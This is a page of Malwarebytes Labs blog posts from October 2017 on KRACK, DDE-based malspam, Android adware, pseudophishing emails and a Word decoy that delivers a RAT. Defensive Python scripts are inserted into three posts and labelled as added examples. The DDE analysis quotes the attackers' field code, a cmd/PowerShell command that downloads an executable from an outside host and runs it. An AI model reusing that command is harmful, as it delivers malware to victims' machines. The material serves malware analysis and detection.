Techie Feeds

Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable

Malwarebytes - Tue, 10/17/2017 - 16:44

A serious flaw in the wireless protocol that secures all modern protected Wi-Fi networks has been discovered.

How serious? If your device supports Wi-Fi, it is most likely affected. The attack, dubbed KRACK, abuses design or implementation flaws in the Wi-Fi standard itself rather than in any specific hardware. KRACK, short for Key Reinstallation Attack, would allow a malicious actor within Wi-Fi range to insert himself into the network and intercept traffic between the device and the router.

This means everyone using WPA2 (the protocol known as Wireless Protection Access 2) could be impacted to some degree.

How impacted depends on multiple factors, but it ranges from traffic interception and decryption of encrypted data to injection of malicious traffic.

Android and Linux are especially vulnerable to this attack, as they can be tricked into reinstalling an all-zero encryption key, allowing full visibility into the traffic.

The good
  • Attacks can be somewhat mitigated if the traffic is HTTPS.
  • Apple has already patched iOS, macOS, tvOS, and watchOS. Great if your device is current; not so great if it isn’t.
  • Maybe this will finally get outdated routers retired and current ones patched?
  • Attacks are stymied by VPN usage.
  • If you have automatic updates on Windows, a patch has already been pushed, with a caveat. Microsoft still recommends contacting your hardware vendor to see if updated drivers for your wireless adapter are available.
  • Mathy Vanhoef did responsible disclosure and withheld public disclosure until major players could create patches.
The bad
  • Android users, with their fractured landscape and poor patching availability, are at risk, some with no possible solution.
  • Some routers will never receive updated firmware, making them vulnerable forever. Updating the firmware on a router is beyond what the average user feels comfortable doing.
  • While HTTPS can mitigate some attacks, improper implementations on websites are common, and once your traffic is routing through a maliciously controlled “man-in-the-middle” router, you’re vulnerable to other traffic manipulation.
  • Expect KRACK to go from POC to practical deployment at the coffee shop very quickly. Remember Firesheep? WEP wardriving? Someone is bound to make an app that will dramatically lower the difficulty to exploit this.
  • This won’t be fixed fully until the Wi-Fi standard is changed.
What to do about it
  • Run updates on all your devices, systems, and software. If you don’t have automatic updates on your Windows machine, look out for the Microsoft patch, which they issued on October 10.
  • Android users: Keep your eyes peeled for updates from Google, which they said would be available in the coming weeks.
  • If you’ve got Apple products, update them to the latest versions, which will protect against a KRACK attack. Older versions will be vulnerable.
  • See if your router manufacturers have issued updated firmware that addresses this vulnerability and update as soon as possible. If not, you might consider replacing the router.
  • It is important to keep in mind that it’s not only individuals who are impacted by this vulnerability, but also businesses. Any Wi-Fi deployment that uses WPA2 can be exploited. This means organizations should also push updates and be sure remote workers are securing their devices and systems as well.

The post Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Old MS Office feature weaponized in malspam attacks

Malwarebytes - Tue, 10/17/2017 - 15:00

There has been a lot of talk recently following a write-up and proof of concept about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby-trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers, but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

At first, DDE was used in some targeted attacks. Now it has gone mainstream with the group behind Hancitor (campaign spotted by @James_inthe_box, DDE use identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a Yara rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\\Windows\\System32\\cmd.exe " /k powershell.exe (New-Object System.Net. WebClient).DownloadFile('http://frontiertherapycenter[.]com/16.exe', '%TEMP%\\tvs.exe');Start-Process '%TEMP%\\tvs.exe'"</w:instrText>

The rest of the attack is straightforward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.
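One way to catch the split-string evasion described above, added here as an example (not Malwarebytes' code, nor Didier Stevens' Yara rule): re-join every <w:instrText> run between a field's begin and end markers before matching, so "Dd" + "E" is still detected. The .docx it scans is constructed in memory by build_sample_docx(), which is a test fixture rather than a real sample.

```python
"""Find DDE field codes in a .docx even when the field text is split
across several <w:instrText> runs (the Yara evasion described above).

Added example, not Malwarebytes' code or Didier Stevens' rule.
build_sample_docx() constructs a minimal test document in memory."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def w(tag: str) -> str:
    """Fully qualified WordprocessingML tag name for ElementTree."""
    return f"{{{W_NS}}}{tag}"


# A field code that starts with DDE or DDEAUTO, optionally quoted,
# in any letter case (e.g. "DdE" c:\Windows\System32\cmd.exe ...).
DDE_FIELD = re.compile(r'^\s*"?\s*dde(auto)?\b', re.IGNORECASE)


def extract_field_codes(part_xml: bytes) -> list:
    """Return every field code in a document part with split runs re-joined.

    A complex field is <w:fldChar w:fldCharType="begin"/>, one or more
    <w:instrText> runs, then "separate"/"end" fldChars. Matching one
    instrText at a time misses "Dd" + "E", so the runs are concatenated.
    Nested fields are not tracked; the outermost code is reported.
    """
    root = ET.fromstring(part_xml)
    codes = []
    current = None  # list of fragments while inside a field, else None
    for elem in root.iter():
        if elem.tag == w("fldChar"):
            kind = elem.get(w("fldCharType"))
            if kind == "begin":
                current = []
            elif kind == "end" and current is not None:
                codes.append("".join(current))
                current = None
        elif elem.tag == w("instrText") and current is not None:
            current.append(elem.text or "")
        elif elem.tag == w("fldSimple"):
            # Simple fields carry the whole code in one attribute
            codes.append(elem.get(w("instr"), ""))
    return codes


def find_dde_fields(docx_bytes: bytes) -> list:
    """Scan every XML part under word/ (body, headers, footers, footnotes)
    and return the DDE field codes found, whitespace-trimmed."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for code in extract_field_codes(zf.read(name)):
                    if DDE_FIELD.search(code):
                        hits.append(code.strip())
    return hits


def build_sample_docx(fragments: list) -> bytes:
    """Construct a minimal .docx whose single field code is split across
    one <w:instrText> run per fragment (test input, not a real sample)."""
    runs = "".join(
        f'<w:r><w:instrText xml:space="preserve">{escape(f)}</w:instrText></w:r>'
        for f in fragments
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        f'<w:r><w:fldChar w:fldCharType="begin"/></w:r>{runs}'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>field result shown to the reader</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed: the field text is split "Dd" / "E..." like the sample above
    sample = build_sample_docx(['"Dd', 'E" c:\\Windows\\System32\\cmd.exe "/k echo sample"'])
    print(find_dde_fields(sample))
```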

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes and consider the validity of retaining it.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document

f945105f5a0bc8ea0d62a28ee62883ffc14377b6abec2d0841e88935fd8902d3

Hancitor

8f94cee61a76c7b9612381978876dcd996c15ae8da50fd75d700a05df571d10a

The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Yet more mobile adware found in Google Play

Malwarebytes - Tue, 10/17/2017 - 07:25

Finding an adware variant that made its way past the Google Play store is out of the ordinary. So when two adware variants slip by in one week, we take notice. Last week, we added two new Ad SDKs to our growing list of adware detections—Adware.Solid and Adware.Cootek. Both Ad SDKs were found in an abundance of apps in Google Play. Adware.Cootek infects over 2,000 Play store apps alone, according to our Mobile Intelligence System.

Behaving badly

Both pieces of adware have remarkably similar traits, displaying full screen ads inside and outside of the infected running app. In addition, they both show ads during screen lock and immediately after unlocking the screen. For your viewing pleasure, below you can find an array of offending ads with captions detailing the inappropriate timing:

We’re listening

Ads displayed inside a free app? Fair game. Ads displayed outside the app, especially during and immediately after screen lock? That, my dear readers, is where we draw the line. Many of these apps contain reviews on Google Play addressing the aggressive nature of the ads contained. Unfortunately, these reviews fall on the deaf ears of the app developers. But fear not my friends, for we are listening. Whether it’s in Google Play or not, we take a hard stance on aggressive adware. Cue shameless (yet helpful) plug: Malwarebytes for Android warns you when Ads are crossing the line.

Use common sense

A note to app developers. We get that you need to make some revenue from your hard work, and selecting an appropriate Ad SDK to tack onto your apps is tough business. Perhaps it’s unfair to take the blame when at the time the Ad SDK was selected, it wasn’t considered adware. However, I ask this question: How many bad reviews does it take before you repackage with another, less offensive, Ad SDK? One app we found which will remain nameless had around 400 one star reviews, and I’m willing to bet most were addressing the aggressive ads. Think about how you’d like to interact with an app: would all of those aggressive ads make you enjoy the app even more, or would they frustrate you? Use common sense when selecting an Ad SDK.

It’s up to the user

As already addressed in our Mobile Menace Monday post, we know that mobile adware is not dangerous malware—more like an inconvenience. In some cases, it goes beyond annoyance when it collects too much personal information. This can include GPS location, phone number, IMEI, and IMSI. Still, this isn’t a blatant act of maliciousness as seen from far more threatening pieces of malware.

It’s fully up to you, the user, whether to delete the offending app or ignore our warnings. If you choose to ignore and accept the presence of these annoying ads and/or the potential to collect personal information, no further harm should come your way. Admittedly, we can’t fully guarantee this claim—thus, I leave you with this: Ignore at your own risk.

Unfortunately, we called it

When Google Play Protect was released, I conveyed my concern for adware along with other Potentially Unwanted Programs (PUPs) still making their way into the Play market. Unsurprisingly, here we are with two new pieces of adware found in one week. My prediction is that this is only the beginning. Stay safe out there!

The post Yet more mobile adware found in Google Play appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 9 – October 15)

Malwarebytes - Mon, 10/16/2017 - 19:00

Last week on the Labs blog, we talked about GDPR as part of our series in the National Cyber Security Awareness Month (NCSAM). We also discussed a new method for phishing Apple ID passwords and the possible ramifications. We analyzed the malvertising chain due to a script that was found on popular websites like those of Equifax (!) and TransUnion. And we explained how decoy Word documents are used to deliver malware using the hyperlink feature in the OpenXML format.

Malwarebytes news

It was a great week for Malwarebytes since we won three awards at the 2017 Computing Security Awards: Security Company of the Year, Editors Choice, and Malware Solution of the Year. And we were chosen as the winner in the “Rising Star: Cybersecurity Solution” category of NetworkWorld Asia 2017 Readers’ Choice Awards.

Our CEO, Marcin Kleczynski, was interviewed by the Huffington Post on the subject 5 things I wish someone told me before I became CEO. And the Malwarebytes Labs team presented you with the quarterly Cybercrime Tactics and Techniques looking back at an unprecedented season of breaches.

Other security news

Business

Akamai presented their findings on a large-scale Fast Flux botnet at their annual customer conference. The botnet using Fast Flux techniques has over 14,000 IP addresses associated with it. Some of the associated IP addresses are in address spaces that are assigned to Fortune 100 companies. These addresses are most likely used by the Fast Flux network owner as spoofed entities and are not genuine members of the network. This allows the botnet to inherit the reputation of the Fortune 100 companies.

Pen Test Partners, a UK cybersecurity company, found appalling security lapses while investigating naval ships that had equipment exposed online. Ships nowadays are complex industrial machines: traditionally isolated, now always-on, connected through VSAT, GSM/LTE, and even Wi-Fi. Crew Internet access, mashed up with electronic navigation systems, ECDIS, propulsion, load management, and numerous other complex, custom systems is a recipe for disaster if not properly secured.

The Register discussed whether the law that would allow hacking victims to seek revenge and hack the hackers who hacked them is a good idea or not. The Active Cyber Defense Certainty Act amends the Computer Fraud and Abuse Act to make limited retaliatory strikes against cyber miscreants legal in America for the first time. The bill would allow hacked organizations to venture outside their networks to identify an intruder and infiltrate their systems, destroy any data that had been stolen, and deploy “beaconing technology” to trace the physical location of the attacker.

A series of distributed denial of service (DDoS) attacks aimed at Sweden’s transportation services caused train delays and disrupted travel services. The DDoS bombardment reportedly crashed the IT system that monitors trains’ locations and tells operators when to go or stop. It also took down the federal agency’s email system, website, and road traffic maps.

Consumer

Politifact was named as yet another site using cryptominers to have visitors pay for their visit to the site. We described the growing number of sites using drive-by mining some time ago.

Android users downloading a fake Adobe Flash Player from a malicious website may find themselves victimized by a unique strain of Android ransomware called DoubleLocker. “The most interesting thing here is that it uses a dangerous combination of three aspects we have not seen before: accessibility services, which perform a click on the user’s behalf; it encrypts data; and it can reset a PIN for a user’s device.”

Stay safe everyone!

The post A week in security (October 9 – October 15) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Phishes, pseudophishes, and bad email

Malwarebytes - Mon, 10/16/2017 - 18:00

Everyone knows about phishing. We’ve all heard that the solution to phishing is to educate the user as, after all, it must be the user’s fault for stupidly clicking on the thing. But what about when perverse incentives make clicking the phish seem logical? What about the enterprise pseudophish—when design-by-committee language, lack of attribution, and overbroad requests for personal information make something look like a phish?

Users will frequently be inundated with corporate requests for information; requests they are often required to comply with. When companies that don’t think these things through end up with something that apes the style of a phish, they can be training their users to click on actual phishes that come their way. Let’s check out a recent example pertinent to the Anthem breach settlement a few months back.

This legitimate email relies fairly heavily on the style and tone favored by phishes for decades. First of all, the email includes a lengthy “Claim ID” string without explaining what that means to the user. Next is the all-caps appeal to authority of a “court-approved legal notice.” The sender then includes an urgent call to action bounded with a deadline to induce anxiety. Lastly, they provide links with no indication of content and no direct connection to Anthem that the user is expected to click on.

Stylistically, the whole thing is a mess of odd margins and shifting formatting for no particular reason. Most concerning is that nowhere in the email does it address who the sender is, how they got your email, or what their connection to Anthem is.

Are there other ways to verify the legitimacy of the email, like examining headers, running the URL provided in a test VM first, or searching on the provided number? Of course. But can we realistically expect the user to do that for every ill-thought-out communication?

User education

The presumption of many security professionals is that clicking a malicious link is a lapse in judgment or temporary insanity on the part of the user. But given the above legitimate message that the user is required to read and act upon, is it unreasonable that they would click on a Dridex malspam using the same pitch? Would we as network defenders be shocked to see a phish that looked like this? And finally, given the absurdly high volume of email most end users deal with in an office environment, aren’t we really educating them to go ahead and click?

Please don’t do this

How do you stop phishing your own users? Before you hit send, make sure of the following:

  • Use consistent text formatting, spacing, and justification.
  • Don’t use third-party assets unless you know the user can display them in the same way you can.
  • Identify yourself, and provide a backchannel to verify who you are outside of the email. Faceless entities engaged in unsolicited contact to spur the user with an urgent call to action are a textbook phishing pitch.
  • Provide the full URL to links you want clicked. One of the most basic tricks in a phish is to hide or obfuscate a URL to discourage vetting by the user.

Malspam mitigation comes with many technical fixes: disabling Office macros, blocking unnecessary outbound traffic on a given user group’s profile, or blocking local execution of scripts, to name a few. But if the ultimate fix for phishing and malspam is the user who simply deletes the offending message, a simpler (and cheaper) fix is to stop flooding them with pseudophishes. Some additional time and forethought on user experience can create incentives leading to better security outcomes for everyone. When we send a clear, consistent message on security, we all stay safer.

The post Phishes, pseudophishes, and bad email appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: despicable adware

Malwarebytes - Mon, 10/16/2017 - 17:00

Are you wondering how that mysterious icon ended up on your Android phone’s start screen? Annoyed at the ads clogging your notification bar? You aren’t alone. Thousands of Android apps now include software that shoves marketing icons onto your phone’s start screen or pushes advertising into your notification bar. These apps give you no warning about the adware invasion.

Even though many of these ads come from different mobile marketing companies, all have the same goal—to make money. Working with app developers hungry for some way to make money themselves, these marketing companies will do anything to make a buck. So they’ll bundle popular apps with adware and bombard millions of users with advertising each week.

Introduction to adware

So what, exactly, does adware do? Adware such as Startapp is a subcategory of Potentially Unwanted Programs (PUPs), which are apps or other types of software that you likely didn’t want installed on your computer, either because they hid their true nature or because they came bundled with other wanted programs. So if you download a popular app that comes bundled with adware, you may be in for a less-than-pleasant experience.

Once adware hijacks your device, it might carry out all sorts of unwanted tasks. For example, it could display questionable advertising content as icons, notification messages in the device interface, or pop-up messages. It might also change your browser front page or default search engine. It doesn’t matter whether you are using Chrome, Firefox, or other browsers: It affects all of them.

Let’s take as an example an app called Qr Code And Barcode Reader, which was once available on the Google Play market, but has now been removed. Qr Code marketed itself as a simple barcode reader, but hiding in plain sight was adware.

As discussed in our blog Mobile Menace Monday: Implications of Google Play Protect, Google Play is not impenetrable. In fact, during the time of this writing, two new types of Adware were found in Google Play; Adware.Solid and Adware.Cootek. This is probably why the Qr Code app was available on the market in the first place. So let’s pretend we found this app in Google Play and decided to install it.

First evidence

When you first install Qr Code, it will ask you for device admin permissions without any note of why it needs these rights. If you’re a discerning user, this first piece of evidence may lead you to certain conclusions about the legality of the application itself. However, most people would probably take a quick glance and hit “activate” in order to get the app they were looking for.

Once you select “activate,” you give the app full access to the phone. This is when the app launches its evil plan to load and show ads directly on the home screen. We can explicitly observe this from logcat, a tool used to view real-time system messages on an Android device.

Logcat evidence:

09-03 07:55:29.961 589-701/system_process I/ActivityManager: START u0 {flg=0x14000000 cmp=com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity} from uid 10064 on display 0
09-03 07:55:29.972 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 W/GooglePlayServicesUtil: Google Play Store is missing.
09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Starting ad request.
09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Use AdRequest.Builder.addTestDevice("7C6CCED8FF697C98BEAA38D05BG347D4") to get test ads on this device.
09-03 07:55:30.500 589-610/system_process I/ActivityManager: Displayed com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity: +532ms

Scalpel, clamp

To find the smoking gun, a technically savvy person would check the manifest file, where the permissions, activities, services, and receivers associated with Adware.Startapp appear in the list. Thus, without any doubt, we can say that this Qr Code app has adware components inside.
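The manifest check above, turned into a script (an added example, not Malwarebytes' tooling): it lists the components whose android:name falls under a known ad SDK package and flags any receiver wired up as a device administrator, which is the permission prompt the app shows on first launch. The only SDK prefix listed is the Startapp one visible in this post; the sample manifest, its package name and its AdminReceiver are constructed for the test.

```python
"""Audit a decoded AndroidManifest.xml for components that belong to a
known ad SDK and for receivers that ask for device-admin rights, the two
things the manifest check above looks for.

Added example, not Malwarebytes' tooling. The only SDK prefix listed is
the Startapp one visible in the manifest excerpt; the sample manifest
and its package/receiver names are constructed for the test."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Component name prefixes of ad SDKs, keyed by detection name (extend as needed)
AD_SDK_PREFIXES = {
    "Adware.Startapp": ("com.startapp.android.publish.",),
}
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")
DEVICE_ADMIN_PERMISSION = "android.permission.BIND_DEVICE_ADMIN"
DEVICE_ADMIN_ACTION = "android.app.action.DEVICE_ADMIN_ENABLED"


def android(attr: str) -> str:
    """ElementTree attribute key for android:attr."""
    return f"{{{ANDROID_NS}}}{attr}"


def audit_manifest(manifest_xml: bytes) -> dict:
    """Return requested permissions, ad SDK components as (tag, name, label)
    tuples, and the names of receivers wired up as device administrators."""
    root = ET.fromstring(manifest_xml)
    result = {"permissions": [], "ad_sdk_components": [], "device_admin_receivers": []}
    for perm in root.findall("uses-permission"):
        result["permissions"].append(perm.get(android("name")))
    app = root.find("application")
    if app is None:
        return result
    for comp in app:
        if comp.tag not in COMPONENT_TAGS:
            continue
        name = comp.get(android("name"), "")
        for label, prefixes in AD_SDK_PREFIXES.items():
            if name.startswith(prefixes):
                result["ad_sdk_components"].append((comp.tag, name, label))
        if comp.tag == "receiver":
            # A device-admin receiver is protected by BIND_DEVICE_ADMIN and
            # listens for DEVICE_ADMIN_ENABLED; either marker is enough to flag it
            actions = {a.get(android("name")) for a in comp.iter("action")}
            if (comp.get(android("permission")) == DEVICE_ADMIN_PERMISSION
                    or DEVICE_ADMIN_ACTION in actions):
                result["device_admin_receivers"].append(name)
    return result


# Constructed sample: the Startapp components from the post plus a
# device-admin receiver under a made-up package name.
SAMPLE_MANIFEST = b"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.qrreader">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Qr Code Reader">
    <activity android:name="com.example.qrreader.MainActivity"/>
    <activity android:name="com.startapp.android.publish.ads.list3d.List3DActivity"/>
    <activity android:name="com.startapp.android.publish.adsCommon.activities.OverlayActivity"/>
    <activity android:name="com.startapp.android.publish.adsCommon.activities.FullScreenActivity"/>
    <service android:name="com.startapp.android.publish.common.metaData.PeriodicMetaDataService"/>
    <service android:name="com.startapp.android.publish.common.metaData.InfoEventService"/>
    <receiver android:name="com.startapp.android.publish.common.metaData.BootCompleteListener">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <receiver android:name="com.example.qrreader.AdminReceiver"
        android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    for tag, name, label in report["ad_sdk_components"]:
        print(f"{label}: <{tag}> {name}")
    print("device admin receivers:", report["device_admin_receivers"])
```

Run it against the output of apktool or a similar decoder, since the manifest inside an APK is stored in binary XML.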

Activity:
android:name="com.startapp.android.publish.ads.list3d.List3DActivity"
android:name="com.startapp.android.publish.adsCommon.activities.OverlayActivity"
android:name="com.startapp.android.publish.adsCommon.activities.FullScreenActivity"

Service:
android:name="com.startapp.android.publish.common.metaData.PeriodicMetaDataService"
android:name="com.startapp.android.publish.common.metaData.InfoEventService"

Receiver:
android:name="com.startapp.android.publish.common.metaData.BootCompleteListener"

Methodology

Now we know Qr Code is certainly delivering adware. But in which way? There are many methods of displaying ads, including banners, splash ads, and exit ads. Qr Code uses Interstitial Callback methods.

Interstitial ads are full-screen ads that cover the interface of their host app. They typically appear between natural transition points in the flow of an app, such as between activities or during the pause between levels in a game. When an app shows an interstitial ad, the user has the choice to either tap on the ad and continue to its destination or close it and return to the app.

  • Callback method when the interstitial ad is loaded:
    startAppAds.loadAd(new AdEventListener() { ... });
  • Callback method when the interstitial ad is shown:
    startAppAds.showAd(new AdDisplayListener() { ... });

This type of ad is disruptive, sometimes difficult to close, and often results in a frustrating user experience.

But what you need to keep in mind when faced with adware is that, despite being incredibly bothersome, it is generally not malicious. There’s a significant difference between adware and dangerous malware such as Trojans or ransomware. Therefore, there’s no need to worry or panic: your device is not under imminent threat.

In fact, many mobile applications that are free of charge often include third-party advertising content. This is done as an alternative form of revenue for the software developers, as a result of not charging users for the application itself. Sometimes using these apps outweighs the inconvenience of having adverts displayed. It’s up to you to decide what you’ll put up with in exchange for keeping the application installed.

However, in our opinion, adware does more harm than good, and you shouldn’t have to put up with overbearing pop-ups in order to enjoy an app. (Malwarebytes for Android will detect adware and remove it if you choose.) So next time you download an app, take a hard look at what it includes. If adware is present, you might do better to choose another one!

The post Mobile Menace Monday: despicable adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Decoy Microsoft Word document delivers malware through a RAT

Malwarebytes - Fri, 10/13/2017 - 15:00

In this post, we take a look at a Microsoft Word document which itself is somewhat clean, but is used to launch a multi-stage attack that relies on the hyperlink feature in the OpenXML format. This then loads another document that contains an exploit.

Most malicious Microsoft Office documents involve either macros, embedded scripts, or exploits and are typically delivered via email. In this case, the unsuspecting user opening the decoy Word document will trigger an automatic (no click or interaction required) download of a malicious RTF file that deploys an exploit (CVE-2017-8759), which ends up distributing the final malware payload.

The several-step removed payload is a commercial Remote Administration Tool that, in this case, is used for nefarious purposes. Victims will be none the wiser as the infection process happens in the background, while their Word document finally loads what looks like legitimate content.

While attackers could have sent the exploit-laced document first, that might have triggered detection and quarantine at the email gateway. Instead, the benign document acted as a kind of Trojan horse that made its way to the end user’s desktop, where it would finally show its real intent.

The diagram below summarizes the different steps that this attack takes, from the original document all the way to the malware payload.

Initial package

The initial document was reported by @xme on Twitter. A quick check using oletools indicates that the file has the OpenXML format and no macros.

FILE: Product Description.docx
Type: OpenXML
No VBA macros found.

Since OpenXML files are archives, they can be decompressed to reveal their content.

[CONTENT_TYPES].XML
_RELS/.RELS
WORD/_RELS/DOCUMENT.XML.RELS
WORD/DOCUMENT.XML
WORD/MEDIA/IMAGE1.EMF
WORD/THEME/THEME1.XML
WORD/SETTINGS.XML
WORD/WEBSETTINGS.XML
WORD/STYLESWITHEFFECTS.XML
DOCPROPS/CORE.XML
WORD/STYLES.XML
WORD/FONTTABLE.XML
DOCPROPS/APP.XML

Opening document.xml.rels reveals an interesting external URL, pointing to another document.

The relationship with Id="rID6" is loaded by the main document.xml file. If we open the document without network connectivity (to prevent the automatic execution), we can spot where this object is located.
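A triage step for the staging described above, added as an example (not Malwarebytes' or oletools' code): parse document.xml.rels for relationships with TargetMode="External", then report those that document.xml references by id and that are not plain hyperlinks, since a hyperlink needs a click while other linked parts are resolved when the document opens. That auto-load distinction is an assumption of the script, and the two XML parts it ships with are constructed rather than taken from the real Product Description.docx.

```python
"""List the external relationships of an OpenXML document and flag those
that Word resolves on open without a click, as in the staging described
above, where document.xml loads a relationship pointing to a remote file.

Added example, not Malwarebytes' or oletools' code. Which relationship
types auto-load is an assumption encoded in CLICK_ONLY_TYPES: everything
external except a plain hyperlink is reported as a candidate. The XML
below is constructed; it is not the real Product Description.docx."""
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# External relationship types that need a user click to be followed
CLICK_ONLY_TYPES = {"hyperlink"}


def external_relationships(rels_xml: bytes) -> list:
    """Parse a .rels part and return relationships with TargetMode="External"."""
    root = ET.fromstring(rels_xml)
    rels = []
    for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
        if rel.get("TargetMode") != "External":
            continue
        rels.append({
            "id": rel.get("Id"),
            # Keep only the last path segment, e.g. "oleObject" or "hyperlink"
            "type": rel.get("Type", "").rsplit("/", 1)[-1],
            "target": rel.get("Target"),
        })
    return rels


def auto_loaded_externals(rels_xml: bytes, document_xml: bytes) -> list:
    """External relationships referenced from document.xml whose type is
    not a plain hyperlink: candidates for fetching a remote file on open."""
    text = document_xml.decode("utf-8", errors="replace")
    hits = []
    for rel in external_relationships(rels_xml):
        # r:id, r:embed and r:link attributes all carry a relationship Id
        pattern = rf'\br:(?:id|embed|link)="{re.escape(rel["id"])}"'
        if re.search(pattern, text) and rel["type"] not in CLICK_ONLY_TYPES:
            hits.append(rel)
    return hits


def scan_docx(path: str) -> list:
    """Convenience wrapper for a .docx on disk (a zip archive)."""
    with zipfile.ZipFile(path) as zf:
        return auto_loaded_externals(
            zf.read("word/_rels/document.xml.rels"), zf.read("word/document.xml")
        )


# Constructed sample parts: one clickable hyperlink (rId5) and one linked
# OLE object (rId6) whose target is a remote document.
SAMPLE_RELS = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://example.invalid/stage2.doc" TargetMode="External"/>
</Relationships>"""

SAMPLE_DOCUMENT = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
 xmlns:o="urn:schemas-microsoft-com:office:office"><w:body>
<w:p><w:hyperlink r:id="rId5"><w:r><w:t>Click here</w:t></w:r></w:hyperlink></w:p>
<w:p><w:r><w:object><o:OLEObject Type="Link" ProgID="Word.Document.12" r:id="rId6" UpdateMode="Always"/></w:object></w:r></w:p>
</w:body></w:document>"""

if __name__ == "__main__":
    for rel in auto_loaded_externals(SAMPLE_RELS, SAMPLE_DOCUMENT):
        print(f'{rel["id"]}: {rel["type"]} -> {rel["target"]}')
```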

The actual exploit: CVE-2017-8759

The remote file saqlyf.doc is downloaded and opened by Product Description.docx into the Temporary Internet Files folder.

This time, it is an RTF file.

After we convert the hexadecimal encoding to binary (oledump), we can spot another interesting URL.

At this point, we could be looking at CVE-2017-0199 if the server provided a MIME type response of application/hta. But in this case, we have something different, and we can quickly spot the SOAP-related bug associated with CVE-2017-8759.

The above code will parse and execute the content of the oghujp.hta file pictured below.

The nasty bit is encoded with ChrW, but we can let VBScript do the work and output what it is in human-readable terms.

This is the final part of the exploitation phase, and it involves running PowerShell to download and run a binary.

Attack payload: a RAT

This attack was meant to install a commercial Remote Administration Tool known as Orcus RAT, which, as seen previously, was also hosted on the same server containing the exploit. The program is written in .NET and contains functions such as keylogging, remote desktop, or access to the webcam.

The file is concealed as mozilla.exe and periodically checks with its command and control infrastructure.

While commercial RATs can be used for legitimate purposes, malicious actors often abuse them for their own sinister goals.

Diversion

Part of the malicious VBScript creates a fake document on the fly that is displayed to the user. If you look carefully, you will notice that the file is called Document1, therefore it’s an additional file to the original Product Description.docx one. It also contains too many typos (but that’s a debate for another day).

Attack infrastructure

The exploit and payload used in this attack are served from a free file hosting site at pomf[.]cat.

